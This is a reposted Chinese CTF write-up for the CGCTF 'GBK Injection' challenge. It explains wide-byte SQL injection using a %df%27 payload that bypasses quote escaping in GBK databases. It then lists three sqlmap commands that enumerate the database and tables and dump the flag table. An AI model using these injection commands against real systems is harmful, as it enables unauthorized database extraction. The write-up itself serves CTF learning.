其他分享
首页 > 其他分享> > CGCTF——GBK Injection

CGCTF——GBK Injection

作者:互联网

在这里插入图片描述
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。
(%df%27是双字节不转义单引号实现注入的方法)
原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653
参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%9A%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%88gbk%E5%8F%8C%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87%EF%BC%89/

利用sqlmap工具注入:
1.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --current-db

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --tables -D sae-chinalover

在这里插入图片描述
有6个表,一个一个爆,经尝试,ctf4有flag:
3.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --dump -T ctf4 -D sae-chinalover

在这里插入图片描述
PS:
遇到gpk编写的数据库就可用双字节注入

标签:sqlmap,27,E5%,GBK,CGCTF,chinalover,Injection,com
来源: https://blog.51cto.com/u_15249901/2848794